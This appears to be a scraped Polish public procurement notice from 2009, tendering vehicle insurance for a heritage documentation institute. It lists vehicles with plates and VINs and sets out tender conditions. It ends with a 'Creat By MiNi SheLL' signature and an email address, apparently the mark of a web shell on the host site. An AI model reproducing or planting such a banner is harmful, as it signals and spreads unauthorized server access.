2) Renault FC Kangoo Express,	ciężarowy,	WI 7839 G,	1461,	5,	54.700,00,	VF1FC1EHF38188659,-,		22 000,31.01.2009r.,	31.01.2009r.,	24.08.2010r.,	2006,	fabryczny, -,		Łęknica;
3)Skoda SUPERB 1,8 T,	osobowy,	WI 6767A,	1781,	5,	64.700,00,	TMBDL63U159093768,	AWT170860,	   113 900,31.01.2009r.,	31.01.2009r.,	06.05.2010r.,	2005,	fabryczny,	BEAR LOCK  immobilaiser,	Warszawa;
4)PEUGEOT 306,	osobowy,	WI 3642 K,	1587,	5,	             8300,00	,VF 37BNFTF33208976,	0935278,	   215 200, 01.01.2009r.,	01.01.2009r.,	24.11.2009r.,	2001,	fabryczny, -,		Ziel. Góra;
5) Renault Trafic,	osobowy,	WI 2022c	1998,	8,	51.600,00,	VF1ILCAA65V244836,-,		   100 000, 31.01.2009r.,	31.01.2009r.,	15.05.2010r.,	2005,	fabryczny,	Immobilaiser,	Warszawa;
6)Citroen C-15,	ciężarowy,	FZA G947,	1769,	2,	4.100,00	VF7VDPP0013PP0590,	10CV3H4031853,	   294 000, 
31.01.2009r.,	31.01.2009r.,	12.12.2009r.,	1996, -,		Immibilaiser,	Łęknica;
7)Polonez FSO, 	osobowy,	PLE 98MP,	2000,	5,	4.500,00,	SUPB40CEHYW173570, -,		   118 500, 31.01.2009r.,	31.01.2009r.,	10.12.2009r.,	2000,	-, -,		Trzebiny;
8) Zetor Proxima 6441,	ciągnik rol,	FZA 94TC,	-,	1,	74.400,00,	R 644101396H,	7294-001452-00-06,-, 31.01.2009r.,	31.01.2009r.,	22.12.2009r.,	2006,-,-,			Łęknica,
9) Ursus 1600 /1224/Z120,		ciągnik rol,	FZA 93TC,-,		1,	156.200,00,	UCC060109,	T00191,-,31.01.2009r.,	31.01.2009r.,	22.12.2009r.,	2006, -,-,			Łęknica;
10) Pronar MTZ 320A,	ciągnik rol	,FZA V063,	1551	,1	14.300,00,	00582A,	9374,-, 31.01.2009r.,	31.01.2009r.,	11.05.2009r.,	2000,-,-,			Łęknica;
11)Ursus C 360,	ciągnik rol,	FZA V401,	3120,	1,	-	612791,	589267,-, 31.01.2009r.,	--	,06.04.2009r.,	1988, -, -,			Łęknica;
12)Pol-Mot Warfama T042,	Przyczepa, 	FZA 24RN,	-,	-,	23.700,00,	060038,-,-;31.01.2009r.,	31.01.2009r.,	03.09.2009r.,	2006,-,-,			Łęknica;
13)Biafamar T-117/I	,przyczepa	,FZA R126,-,-,	-	,SXAT 1171PYCB01461,	-,-	,31.01.2009r.,	---,	09.05.2009r.,	2000,-,-,			Łęknica;		
14)Barwiec D 734,	przyczepa,	FZA R772	,-,	-,	-,	0849,	-,-; 31.01.2009r.,	-,	04.04.2009r.,	1990,	-,-,		Łęknica..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.51.30.00-9, 66.51.41.10-0, 66.51.60.00-0, 66.51.50.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust 1 Ustawy Prawo Zamówień Publicznych:

1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.  
2.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.

Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu: 


a.	Oświadczenie Wykonawcy potwierdzające spełnianie warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 Ustawy Prawo Zamówień Publicznych  wg wzoru stanowiącego załącznik nr 3 do SIWZ.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z podmiotów występujących wspólnie.

b.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa każdy z podmiotów oferty wspólnej.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w pkt b) składa odpowiednio dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że: 
1.	nie otwarto jego likwidacji ani nie ogłoszono upadłości 
Dokumenty o których mowa punkcie 1 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kobidz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Krajowy Ośrodek Badań i Dokumentacji Zabytków w Warszawie (00-464) przy ul. Szwoleżerów 9 (pokój nr 15)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2009 godzina 09:00, miejsce: Oferty winny być złożone w kancelarii Krajowego Ośrodka Badań i Dokumentacji Zabytków mieszczącej się w Warszawie (00-464) przy ul. Szwoleżerów 9 (pokój nr 15)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com